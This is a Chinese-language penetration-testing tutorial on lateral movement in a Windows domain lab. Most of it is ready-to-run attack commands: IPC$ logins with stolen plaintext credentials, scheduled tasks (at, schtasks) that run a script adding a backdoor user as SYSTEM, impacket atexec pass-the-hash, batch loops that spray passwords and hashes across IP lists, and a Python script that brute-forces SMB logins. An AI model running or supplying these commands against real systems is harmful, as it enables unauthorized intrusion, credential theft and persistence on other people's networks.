内网安全-域横向批量at&schtasks&impacket

简介: 内网安全-域横向批量at&schtasks&impacket

横向渗透明文传递at&schtasks

在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。

获取到某域主机权限->minikatz得到密码(明文,hash->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令

利用流程

1. 建立IPC链接到目标主机

2. 拷贝要执行的命令脚本到目标主机

3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本

4. 删除IPC链接

net use \\server\ipc$"password" /user:username  # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\                  # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat      # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del    # 删除IPC
net view xx.xx.xx.xx                   # 查看对方共享

#建立IPC常见的错误代码

15:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

251:网络问题,Windows 无法找到网络路径

353:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题

467:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$

51219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除

61326:账号密码错误

71792:目标NetLogon服务未启动,连接域控常常会出现此情况

82242:用户密码过期,目标有账号策略,强制定期更改密码

#建立IPC失败的原因

1)目标系统不是NT或以上的操作系统

2)对方没有打开IPC$共享

3)对方未开启139445端口,或者被防火墙屏蔽

4)输出命令、账号密码有错误

windows 2012 前 系统支持 at 命令

windows 2012后 系统支持 schtasks 命令

当前主机环境

windows server 2012 为域控制器

windows server 2003 域用户

windows 7  域用户

#at < Windows2012

windows server 2003示例:

# 建立ipc连接:
net use \\10.4.7.50\ipc$ "admin!@#45" /user:hack.org\administrator

创建一个bat脚本 copy到对方主机

添加用户
notepad add.bat
net user linuxba test!@#123 /add
#拷贝执行文件到目标机器
copy add.bat \\10.4.7.50\c$  
#添加计划任务
at \\10.4.7.50 17:15 c:\add.bat

2003 查看用户列表

640.png

#schtasks >=Windows2012
# 建立ipc连接:
net use \\10.4.7.52\ipc$ "admin!@#45" /user:hack.org\administrator

#复制文件到其C盘
copy add.bat \\10.4.7.52\c$
#创建adduser任务对应执行文件 
schtasks /create /s 10.4.7.52 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F 
#运行adduser任务
schtasks /run /s 10.4.7.52 /tn adduser /i 
#删除adduser任务
schtasks /delete /s 10.4.7.52 /tn adduser /f

横向渗透明文HASH传递atexec-impacket

# 渗透win7 个人用户(明文)
atexec.exe ./administrator:123@10.4.7.52 "whoami"

640.png

# 渗透win7 域域户 (明文)
atexec.exe hack/administrator:admin!@#45@10.4.7.52 whoami

640.png

# hash 渗透
atexec.exe -hashes:e90127c07127ed12f4ebf668acca53e9 ./administrator@10.4.7.52 whoami
横向渗透明文HASH传递批量利用-综合
#批量检测IP对应明文连接
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator
#批量检测IP对应明文回显版
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami
#批量检测明文对应IP回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@10.4.7.52 whoami 
#批量检测HASH对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@10.4.7.52 whoami 
#横向渗透明文HASH传递批量利用-升级版
net use \\10.4.7.52\ipc$ admin!@#45 /user:hack\hack
#pip install pyinstaller
#pyinstaller -F newhash.py 生成可执行EXE
import os,time
ips={
   '10.4.7.50',
   '10.4.7.51',
   '10.4.7.52'
}
users={
   'Administrator',
   'hack',
   'kali',
   'ajie'
}
passs={
   'admin',
   'admin!@#45',
   '123'
}
for ip in ips:
   for user in users:
       for mima in passs:
           exec="net use \\"+ "\\"+ip+'\ipc$ '+mima+' /user:hack\\'+user
           print('--->'+exec+'<---')
           os.system(exec)
           time.sleep(1)
相关文章
|
8月前
|
网络协议 Linux 网络架构
【Cisco Packet Tracer】验证IP数据包的分组与转发流程
【Cisco Packet Tracer】验证IP数据包的分组与转发流程
171 0
|
1月前
|
网络安全 数据库
【Azure Batch Account】批处理服务是否可以固定出口访问IP地址呢?
本文介绍了如何解决Azure Batch Account服务访问受防火墙保护资源的问题。由于Batch Account没有固定的出口IP地址,需要将其所有IP地址加入防火墙白名单。文章提供了创建具有指定公共IP地址的Batch池的方法,并详细说明了配置步骤和注意事项。参考文档包括Azure IP范围和服务标签以及创建具有指定公共IP地址的Azure Batch池的官方指南。
|
7月前
|
安全 Shell 数据安全/隐私保护
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
248 0
|
数据采集 移动开发 数据可视化
空间转录组|Load10X_Spatial函数修改适配多形式数据 + 空转标准流程
空间转录组|Load10X_Spatial函数修改适配多形式数据 + 空转标准流程
692 0
|
存储 缓存 移动开发
im 应用多点登录和消息漫游架构
im 应用多点登录和消息漫游架构
im 应用多点登录和消息漫游架构
|
网络协议 物联网
DFP 数据转发协议应用实例 4.修改网络中指定设备的参数
稳控科技编写的一套数据转发规则, 取自“自由转发协议 FFP(Free Forward Protocol)” ,或者 DFP(DoubleF Protocol), DF 也可以理解为 Datas Forward(数据转发)的缩写。DF 协议是与硬件接口无关的数据链路层协议,规定了数据流如何在不同设备之间、不同接口之间的传输方向。 DF 协议一般用于延长数字接口的传输距离(数据中继),它与硬件接口类型无关,可以基于 UART、 LoRA、TCP 等异步数据传输介质。
DFP 数据转发协议应用实例  4.修改网络中指定设备的参数
|
监控 Java 开发工具
LogHub新增公网IP/服务端到达时间标签
日志服务LogHub功能新增加了两种默认标签:日志写入客户端的公网IP地址和服务端接受日志的时间。客户端公网IP可以用于统计客户端的位置分布。服务端到达时间可以统计日志的实际到达服务端的时间。
2316 0